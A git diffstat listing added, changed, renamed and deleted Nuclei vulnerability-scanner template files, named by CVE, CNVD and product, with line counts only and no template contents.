nuclei-templates/CVE-2022/cve-2022-30777.yaml | 56 + nuclei-templates/CVE-2022/cve-2022-31268.yaml | 58 + nuclei-templates/CVE-2022/cve-2022-31793.yaml | 47 + ...VE-2022-32007.yaml => cve-2022-32007.yaml} | 0 nuclei-templates/CVE-2022/cve-2022-32022.yaml | 21 +- ...VE-2022-32025.yaml => cve-2022-32025.yaml} | 0 nuclei-templates/CVE-2022/cve-2022-32026.yaml | 54 - nuclei-templates/CVE-2022/cve-2022-32409.yaml | 48 + nuclei-templates/CVE-2022/cve-2022-32444.yaml | 20 +- nuclei-templates/CVE-2022/cve-2022-33174.yaml | 25 +- ...VE-2022-34047.yaml => cve-2022-34047.yaml} | 0 nuclei-templates/CVE-2022/cve-2022-34049.yaml | 17 +- ...VE-2022-35416.yaml => cve-2022-35416.yaml} | 0 nuclei-templates/CVE-2022/cve-2022-36883.yaml | 38 - nuclei-templates/CVE-2022/cve-2022-42889.yaml | 4 +- nuclei-templates/CVE-2023/CVE-2023-0099.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-0126.yaml | 13 +- nuclei-templates/CVE-2023/CVE-2023-0236.yaml | 11 +- nuclei-templates/CVE-2023/CVE-2023-0261.yaml | 11 +- nuclei-templates/CVE-2023/CVE-2023-0297.yaml | 61 + nuclei-templates/CVE-2023/CVE-2023-0334.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-0448.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-0514.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-0527.yaml | 27 +- nuclei-templates/CVE-2023/CVE-2023-0552.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-0562.yaml | 16 +- nuclei-templates/CVE-2023/CVE-2023-0563.yaml | 16 +- nuclei-templates/CVE-2023/CVE-2023-0585.yaml | 60 +- nuclei-templates/CVE-2023/CVE-2023-0600.yaml | 29 +- nuclei-templates/CVE-2023/CVE-2023-0602.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-0630.yaml | 12 +- nuclei-templates/CVE-2023/CVE-2023-0669.yaml | 31 +- nuclei-templates/CVE-2023/CVE-2023-0777.yaml | 9 +- nuclei-templates/CVE-2023/CVE-2023-0900.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-0942.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-0947.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-0948.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-0968.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-1020.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-1080.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-1177.yaml | 12 +- nuclei-templates/CVE-2023/CVE-2023-1263.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-1362.yaml | 11 +- nuclei-templates/CVE-2023/CVE-2023-1408.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-1434.yaml | 7 +- nuclei-templates/CVE-2023/CVE-2023-1454.yaml | 12 +- nuclei-templates/CVE-2023/CVE-2023-1496.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-1546.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-1671.yaml | 11 +- nuclei-templates/CVE-2023/CVE-2023-1698.yaml | 28 +- nuclei-templates/CVE-2023/CVE-2023-1719.yaml | 7 +- nuclei-templates/CVE-2023/CVE-2023-1730.yaml | 11 +- nuclei-templates/CVE-2023/CVE-2023-1780.yaml | 6 +- nuclei-templates/CVE-2023/CVE-2023-1835.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-1880.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-1890.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-20073.yaml | 48 +- nuclei-templates/CVE-2023/CVE-2023-2009.yaml | 6 +- nuclei-templates/CVE-2023/CVE-2023-20198.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-2023.yaml | 12 +- nuclei-templates/CVE-2023/CVE-2023-20864.yaml | 11 +- nuclei-templates/CVE-2023/CVE-2023-20887.yaml | 32 +- nuclei-templates/CVE-2023/CVE-2023-20888.yaml | 21 +- nuclei-templates/CVE-2023/CVE-2023-20889.yaml | 33 +- nuclei-templates/CVE-2023/CVE-2023-2122.yaml | 6 +- nuclei-templates/CVE-2023/CVE-2023-2130.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-2178.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-2224.yaml | 46 +- nuclei-templates/CVE-2023/CVE-2023-22432.yaml | 19 +- nuclei-templates/CVE-2023/CVE-2023-22463.yaml | 19 +- nuclei-templates/CVE-2023/CVE-2023-22478.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-22480.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-22515.yaml | 9 +- nuclei-templates/CVE-2023/CVE-2023-22518.yaml | 6 +- nuclei-templates/CVE-2023/CVE-2023-2252.yaml | 19 +- nuclei-templates/CVE-2023/CVE-2023-22620.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-2272.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-22897.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-23161.yaml | 14 +- nuclei-templates/CVE-2023/CVE-2023-23333.yaml | 60 + nuclei-templates/CVE-2023/CVE-2023-23488.yaml | 15 +- nuclei-templates/CVE-2023/CVE-2023-23489.yaml | 11 +- nuclei-templates/CVE-2023/CVE-2023-23491.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-23492.yaml | 13 +- nuclei-templates/CVE-2023/CVE-2023-2356.yaml | 12 +- ...ve-2023-23752.yaml => CVE-2023-23752.yaml} | 0 nuclei-templates/CVE-2023/CVE-2023-24044.yaml | 26 +- nuclei-templates/CVE-2023/CVE-2023-24243.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-24278.yaml | 11 +- nuclei-templates/CVE-2023/CVE-2023-24322.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-24367.yaml | 7 +- nuclei-templates/CVE-2023/CVE-2023-24488.yaml | 68 +- nuclei-templates/CVE-2023/CVE-2023-24489.yaml | 14 +- nuclei-templates/CVE-2023/CVE-2023-24657.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-24733.yaml | 14 +- nuclei-templates/CVE-2023/CVE-2023-24735.yaml | 14 +- nuclei-templates/CVE-2023/CVE-2023-24737.yaml | 14 +- nuclei-templates/CVE-2023/CVE-2023-2479.yaml | 76 +- nuclei-templates/CVE-2023/CVE-2023-25135.yaml | 12 +- nuclei-templates/CVE-2023/CVE-2023-25157.yaml | 26 +- nuclei-templates/CVE-2023/CVE-2023-25194.yaml | 99 - nuclei-templates/CVE-2023/CVE-2023-25346.yaml | 16 +- nuclei-templates/CVE-2023/CVE-2023-25573.yaml | 14 +- nuclei-templates/CVE-2023/CVE-2023-25717.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-26067.yaml | 11 +- nuclei-templates/CVE-2023/CVE-2023-26255.yaml | 13 +- nuclei-templates/CVE-2023/CVE-2023-26256.yaml | 52 + nuclei-templates/CVE-2023/CVE-2023-26347.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-26360.yaml | 26 +- nuclei-templates/CVE-2023/CVE-2023-2640.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-26469.yaml | 24 +- nuclei-templates/CVE-2023/CVE-2023-2648.yaml | 16 +- nuclei-templates/CVE-2023/CVE-2023-26842.yaml | 16 +- nuclei-templates/CVE-2023/CVE-2023-26843.yaml | 18 +- nuclei-templates/CVE-2023/CVE-2023-27008.yaml | 9 +- nuclei-templates/CVE-2023/CVE-2023-27034.yaml | 41 +- nuclei-templates/CVE-2023/CVE-2023-27159.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-27179.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-27292.yaml | 11 +- nuclei-templates/CVE-2023/CVE-2023-2732.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-27350.yaml | 11 +- nuclei-templates/CVE-2023/CVE-2023-27372.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-27482.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-27524.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-27587.yaml | 55 +- nuclei-templates/CVE-2023/CVE-2023-2766.yaml | 24 +- nuclei-templates/CVE-2023/CVE-2023-2779.yaml | 9 +- nuclei-templates/CVE-2023/CVE-2023-2780.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-27922.yaml | 6 +- nuclei-templates/CVE-2023/CVE-2023-2796.yaml | 11 +- nuclei-templates/CVE-2023/CVE-2023-28121.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-2813.yaml | 16 +- nuclei-templates/CVE-2023/CVE-2023-2822.yaml | 11 +- nuclei-templates/CVE-2023/CVE-2023-2825.yaml | 213 + nuclei-templates/CVE-2023/CVE-2023-28343.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-28432.yaml | 9 +- nuclei-templates/CVE-2023/CVE-2023-28665.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-29084.yaml | 11 +- nuclei-templates/CVE-2023/CVE-2023-29298.yaml | 13 +- nuclei-templates/CVE-2023/CVE-2023-29300.yaml | 13 +- nuclei-templates/CVE-2023/CVE-2023-29357.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-29439.yaml | 9 +- nuclei-templates/CVE-2023/CVE-2023-29489.yaml | 55 +- nuclei-templates/CVE-2023/CVE-2023-29622.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-29623.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-2982.yaml | 18 +- nuclei-templates/CVE-2023/CVE-2023-29887.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-29919.yaml | 9 +- nuclei-templates/CVE-2023/CVE-2023-29922.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-29923.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-30013.yaml | 25 +- nuclei-templates/CVE-2023/CVE-2023-30019.yaml | 9 +- nuclei-templates/CVE-2023/CVE-2023-30150.yaml | 50 +- nuclei-templates/CVE-2023/CVE-2023-30210.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-30212.yaml | 12 +- nuclei-templates/CVE-2023/CVE-2023-30256.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-30258.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-30534.yaml | 34 +- nuclei-templates/CVE-2023/CVE-2023-30625.yaml | 27 +- nuclei-templates/CVE-2023/CVE-2023-30777.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-30868.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-30943.yaml | 56 +- nuclei-templates/CVE-2023/CVE-2023-31059.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-31465.yaml | 6 +- nuclei-templates/CVE-2023/CVE-2023-31548.yaml | 16 +- nuclei-templates/CVE-2023/CVE-2023-32117.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-3219.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-32235.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-32243.yaml | 89 +- nuclei-templates/CVE-2023/CVE-2023-32315.yaml | 29 +- nuclei-templates/CVE-2023/CVE-2023-32563.yaml | 9 +- nuclei-templates/CVE-2023/CVE-2023-33338.yaml | 29 +- nuclei-templates/CVE-2023/CVE-2023-33405.yaml | 7 +- nuclei-templates/CVE-2023/CVE-2023-33439.yaml | 32 +- nuclei-templates/CVE-2023/CVE-2023-33440.yaml | 78 +- nuclei-templates/CVE-2023/CVE-2023-3345.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-33510.yaml | 16 +- nuclei-templates/CVE-2023/CVE-2023-33568.yaml | 22 +- nuclei-templates/CVE-2023/CVE-2023-33584.yaml | 9 +- nuclei-templates/CVE-2023/CVE-2023-33629.yaml | 9 +- nuclei-templates/CVE-2023/CVE-2023-33831.yaml | 29 +- nuclei-templates/CVE-2023/CVE-2023-34020.yaml | 30 +- nuclei-templates/CVE-2023/CVE-2023-34124.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-34192.yaml | 28 +- nuclei-templates/CVE-2023/CVE-2023-34259.yaml | 6 +- nuclei-templates/CVE-2023/CVE-2023-34362.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-34537.yaml | 31 +- nuclei-templates/CVE-2023/CVE-2023-34598.yaml | 31 +- nuclei-templates/CVE-2023/CVE-2023-34599.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-3460.yaml | 110 +- nuclei-templates/CVE-2023/CVE-2023-34659.yaml | 19 +- nuclei-templates/CVE-2023/CVE-2023-34751.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-34752.yaml | 6 +- nuclei-templates/CVE-2023/CVE-2023-34753.yaml | 6 +- nuclei-templates/CVE-2023/CVE-2023-34755.yaml | 4 +- nuclei-templates/CVE-2023/CVE-2023-34756.yaml | 6 +- nuclei-templates/CVE-2023/CVE-2023-3479.yaml | 42 +- nuclei-templates/CVE-2023/CVE-2023-34843.yaml | 12 +- nuclei-templates/CVE-2023/CVE-2023-34960.yaml | 69 +- nuclei-templates/CVE-2023/CVE-2023-35078.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-35082.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-3519.yaml | 31 +- nuclei-templates/CVE-2023/CVE-2023-35813.yaml | 9 +- nuclei-templates/CVE-2023/CVE-2023-35843.yaml | 11 +- nuclei-templates/CVE-2023/CVE-2023-35844.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-35885.yaml | 23 +- nuclei-templates/CVE-2023/CVE-2023-36287.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-36289.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-36306.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-36346.yaml | 9 +- nuclei-templates/CVE-2023/CVE-2023-36844.yaml | 16 +- nuclei-templates/CVE-2023/CVE-2023-36845.yaml | 17 +- nuclei-templates/CVE-2023/CVE-2023-36934.yaml | 11 +- nuclei-templates/CVE-2023/CVE-2023-3710.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-37265.yaml | 11 +- nuclei-templates/CVE-2023/CVE-2023-37266.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-37270.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-37462.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-37474.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-37580.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-37629.yaml | 31 +- nuclei-templates/CVE-2023/CVE-2023-3765.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-37679.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-37728.yaml | 6 +- nuclei-templates/CVE-2023/CVE-2023-37979.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-38035.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-38205.yaml | 12 +- nuclei-templates/CVE-2023/CVE-2023-3843.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-38433.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-3844.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-3845.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-3846.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-3847.yaml | 9 +- nuclei-templates/CVE-2023/CVE-2023-3848.yaml | 9 +- nuclei-templates/CVE-2023/CVE-2023-3849.yaml | 9 +- nuclei-templates/CVE-2023/CVE-2023-38501.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-38646.yaml | 74 +- nuclei-templates/CVE-2023/CVE-2023-38992.yaml | 51 + nuclei-templates/CVE-2023/CVE-2023-39026.yaml | 48 +- nuclei-templates/CVE-2023/CVE-2023-39108.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-39109.yaml | 9 +- nuclei-templates/CVE-2023/CVE-2023-39110.yaml | 9 +- nuclei-templates/CVE-2023/CVE-2023-39120.yaml | 7 +- nuclei-templates/CVE-2023/CVE-2023-39141.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-39143.yaml | 13 +- nuclei-templates/CVE-2023/CVE-2023-3936.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-39361.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-39598.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-39600.yaml | 6 +- nuclei-templates/CVE-2023/CVE-2023-39676.yaml | 22 +- nuclei-templates/CVE-2023/CVE-2023-39677.yaml | 29 +- nuclei-templates/CVE-2023/CVE-2023-39700.yaml | 4 +- nuclei-templates/CVE-2023/CVE-2023-39796.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-40208.yaml | 6 +- nuclei-templates/CVE-2023/CVE-2023-40779.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-4110.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-4111.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-4112.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-4113.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-4114.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-4115.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-4116.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-41265.yaml | 59 +- nuclei-templates/CVE-2023/CVE-2023-41266.yaml | 48 +- nuclei-templates/CVE-2023/CVE-2023-4148.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-41538.yaml | 6 +- nuclei-templates/CVE-2023/CVE-2023-41642.yaml | 6 +- nuclei-templates/CVE-2023/CVE-2023-4168.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-4169.yaml | 7 +- nuclei-templates/CVE-2023/CVE-2023-4173.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-4174.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-41892.yaml | 31 +- nuclei-templates/CVE-2023/CVE-2023-42442.yaml | 20 +- nuclei-templates/CVE-2023/CVE-2023-42793.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-43261.yaml | 23 +- nuclei-templates/CVE-2023/CVE-2023-43325.yaml | 9 +- nuclei-templates/CVE-2023/CVE-2023-43326.yaml | 7 +- nuclei-templates/CVE-2023/CVE-2023-43795.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-4415.yaml | 6 +- nuclei-templates/CVE-2023/CVE-2023-4451.yaml | 7 +- nuclei-templates/CVE-2023/CVE-2023-4547.yaml | 4 +- nuclei-templates/CVE-2023/CVE-2023-45542.yaml | 9 +- nuclei-templates/CVE-2023/CVE-2023-4568.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-45852.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-4596.yaml | 12 +- nuclei-templates/CVE-2023/CVE-2023-4634.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-46604.yaml | 56 +- nuclei-templates/CVE-2023/CVE-2023-46747.yaml | 11 +- nuclei-templates/CVE-2023/CVE-2023-4714.yaml | 22 +- nuclei-templates/CVE-2023/CVE-2023-47246.yaml | 6 +- nuclei-templates/CVE-2023/CVE-2023-47684.yaml | 64 +- nuclei-templates/CVE-2023/CVE-2023-49103.yaml | 46 +- nuclei-templates/CVE-2023/CVE-2023-4911.yaml | 15 +- nuclei-templates/CVE-2023/CVE-2023-4966.yaml | 6 +- nuclei-templates/CVE-2023/CVE-2023-4974.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-5074.yaml | 10 +- nuclei-templates/CVE-2023/CVE-2023-51467.yaml | 47 - nuclei-templates/CVE-2023/CVE-2023-5244.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-5360.yaml | 25 +- nuclei-templates/CVE-2023/CVE-2023-5375.yaml | 7 +- nuclei-templates/CVE-2023/cve-2023-33246.yaml | 15 +- nuclei-templates/CVE-2024/CVE-2024-1021.yaml | 11 +- nuclei-templates/CVE-2024/CVE-2024-1183.yaml | 36 + nuclei-templates/CVE-2024/CVE-2024-1207.yaml | 77 +- .../CVE-2024-1561.yaml} | 0 .../CVE-2024-1728.yaml} | 0 nuclei-templates/CVE-2024/CVE-2024-22320.yaml | 40 +- nuclei-templates/CVE-2024/CVE-2024-23167.yaml | 77 + nuclei-templates/CVE-2024/CVE-2024-29059.yaml | 87 +- nuclei-templates/CVE-2024/CVE-2024-34102.yaml | 48 +- nuclei-templates/CVE-2024/CVE-2024-36401.yaml | 44 +- nuclei-templates/CVE-2024/CVE-2024-3673.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-37084.yaml | 44 + nuclei-templates/CVE-2024/CVE-2024-3899.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-41667.yaml | 244 + nuclei-templates/CVE-2024/CVE-2024-4358.yaml | 10 +- nuclei-templates/CVE-2024/CVE-2024-45269.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-45270.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-45429.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-45625.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-5561.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-5567.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-5628.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-5789.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-5867.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-5869.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-5870.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-5884.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-6020.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-6088.yaml | 24 - nuclei-templates/CVE-2024/CVE-2024-6544.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-6792.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-6888.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-6889.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-6910.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-7132.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-7354.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-7423.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-7716.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-7888.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-7891.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-7955.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-8031.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-8242.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-8269.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-8522.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-8529.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-8622.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-8656.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-8663.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-8664.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-8665.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-8714.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-8730.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-8731.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-8732.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-8734.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-8737.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-8742.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-8747.yaml | 59 + nuclei-templates/Other/0xlfi2.yaml | 39 - nuclei-templates/Other/0xlfifuzz1.yaml | 40 - .../Other/3com-nj2000-default-login.yaml | 5 +- .../Other/3cx-management-console-2.yaml | 43 + .../Other/3cx-management-console.yaml | 41 - .../Other/3cx-phone-management-panel.yaml | 15 +- .../3cx-phone-webclient-management-panel.yaml | 17 +- nuclei-templates/Other/3cx.yaml | 20 + .../Other/3dprint-arbitrary-file-upload.yaml | 23 +- .../Other/3g-wireless-gateway-3.yaml | 57 +- ...-fileRead.yaml => 3gmeeting-fileread.yaml} | 0 nuclei-templates/Other/403-bypass_method.yaml | 28 - .../Other/403-bypass_xheaders.yaml | 52 - .../Other/403-bypass_xrewriteurl.yaml | 33 - nuclei-templates/Other/403-finder.yaml | 7 +- nuclei-templates/Other/404-to-301-xss.yaml | 14 +- .../{74cms-sqli-9.yaml => 74cms-sqli-10.yaml} | 0 nuclei-templates/Other/74cms-sqli-8.yaml | 32 + nuclei-templates/Other/ApacheSolr-SSRF-1.yaml | 21 + nuclei-templates/Other/ApacheSolr-SSRF-2.yaml | 21 + nuclei-templates/Other/ApacheSolr-SSRF-3.yaml | 20 + nuclei-templates/Other/ApacheSolr-SSRF-4.yaml | 20 + nuclei-templates/Other/ApacheSolr-SSRF-5.yaml | 21 + nuclei-templates/Other/ApacheSolr-SSRF-6.yaml | 21 + nuclei-templates/Other/ApacheStruts-RCE.yaml | 20 + nuclei-templates/Other/CNNVD-200705-315.yaml | 26 + nuclei-templates/Other/CNVD-2017-03561.yaml | 21 +- ...9-01348-1040.yaml => CNVD-2019-01348.yaml} | 0 nuclei-templates/Other/CNVD-2019-17294.yaml | 5 - nuclei-templates/Other/CNVD-2019-19299.yaml | 43 + nuclei-templates/Other/CNVD-2020-23735.yaml | 24 + nuclei-templates/Other/CNVD-2020-26585.yaml | 24 +- nuclei-templates/Other/CNVD-2020-46552.yaml | 34 - nuclei-templates/Other/CNVD-2020-63964.yaml | 5 +- nuclei-templates/Other/CNVD-2020-67113.yaml | 38 - nuclei-templates/Other/CNVD-2020-68596.yaml | 44 - nuclei-templates/Other/CNVD-2021-01627.yaml | 5 - nuclei-templates/Other/CNVD-2021-01931.yaml | 25 + nuclei-templates/Other/CNVD-2021-10543.yaml | 21 + nuclei-templates/Other/CNVD-2021-14536.yaml | 45 - nuclei-templates/Other/CNVD-2021-15822.yaml | 27 - nuclei-templates/Other/CNVD-2021-15824.yaml | 32 + nuclei-templates/Other/CNVD-2021-17369.yaml | 24 - nuclei-templates/Other/CNVD-2021-30167-1.yaml | 37 + nuclei-templates/Other/CNVD-2021-30167-2.yaml | 37 + nuclei-templates/Other/CNVD-2021-32799.yaml | 7 +- nuclei-templates/Other/CNVD-2021-33202.yaml | 8 +- nuclei-templates/Other/CNVD-2021-41972.yaml | 5 +- nuclei-templates/Other/CNVD-2021-43984.yaml | 5 +- nuclei-templates/Other/CNVD-2021-49104.yaml | 43 + nuclei-templates/Other/CNVD-2022-42853.yaml | 8 +- nuclei-templates/Other/CNVD-2022-43245.yaml | 10 +- nuclei-templates/Other/CNVD-2022-86535.yaml | 82 +- nuclei-templates/Other/CNVD-2023-08743.yaml | 5 +- nuclei-templates/Other/CNVD-C-2023-76801.yaml | 23 +- nuclei-templates/Other/CRMEB-sqli.yaml | 2 - nuclei-templates/Other/CVE_2023_51467.yaml | 51 + nuclei-templates/Other/Confluence-SSRF.yaml | 18 + .../Other/{dse855.yaml => DSE855.yaml} | 0 ..._Sqli.yaml => Dahua_Video_FileUpload.yaml} | 0 .../Other/Devias-kit-register.yaml | 50 +- ...ord-sqli.yaml => DocCMS-keyword-sqli.yaml} | 0 nuclei-templates/Other/Dotnetcms-SQLi.yaml | 29 - nuclei-templates/Other/Dynatrace-token.yaml | 13 + ...ist-sqli.yaml => EmpireCMS-list-sqli.yaml} | 0 nuclei-templates/Other/Facebook-secret.yaml | 4 +- .../Other/GLPI-9.3.3-SQL-Injection.yaml | 25 - nuclei-templates/Other/GT-AC2900-login.yaml | 26 - .../{google-api-7772.yaml => Google-api.yaml} | 0 nuclei-templates/Other/Grafana-file-read.yaml | 33 - nuclei-templates/Other/Header-Injection.yaml | 4 - ...ikvision_iVMS-8700_Fileupload_report.yaml} | 0 nuclei-templates/Other/JBoss-SSRF.yaml | 21 + .../Other/JeeSite-default-login.yaml | 25 + nuclei-templates/Other/Jenkins-RCE.yaml | 21 + .../{kingdee-sqli.yaml => Kingdee-sqli.yaml} | 0 ...gsoft-upload.yaml => Kingsoft-upload.yaml} | 0 .../Landray OA treexml.tmpl Script RCE.yaml | 41 +- ...agicflow-sqli.yaml => MagicFlow-sqli.yaml} | 0 nuclei-templates/Other/Mailchimp-api.yaml | 16 - nuclei-templates/Other/Mailgun-api.yaml | 13 + .../Other/Mantis-Default_login.yaml | 46 - .../Other/NETSurveillance-fileRead.yaml | 3 - nuclei-templates/Other/OpenTSDB-RCE-1.yaml | 21 + nuclei-templates/Other/OpenTSDB-RCE-2.yaml | 21 + nuclei-templates/Other/Oracle-OAM-XSS.yaml | 28 - nuclei-templates/Other/PeopleSoft-XXE-1.yaml | 24 + nuclei-templates/Other/PeopleSoft-XXE-2.yaml | 24 + .../Other/RCE-CVE-2021-41773.yaml | 18 - nuclei-templates/Other/RedMine-Detect.yaml | 54 - .../Other/Redmine-Default-Login.yaml | 21 + ...fileupload.yaml => Ruijie_EXCU_SHELL.yaml} | 0 nuclei-templates/Other/SAP-NetWeaver-rce.yaml | 22 - .../Other/SQLInjection_ERROR.yaml | 42 +- nuclei-templates/Other/SQLNet-log.yaml | 34 +- nuclei-templates/Other/Sap-redirect.yaml | 29 - ...-media-rce.yaml => 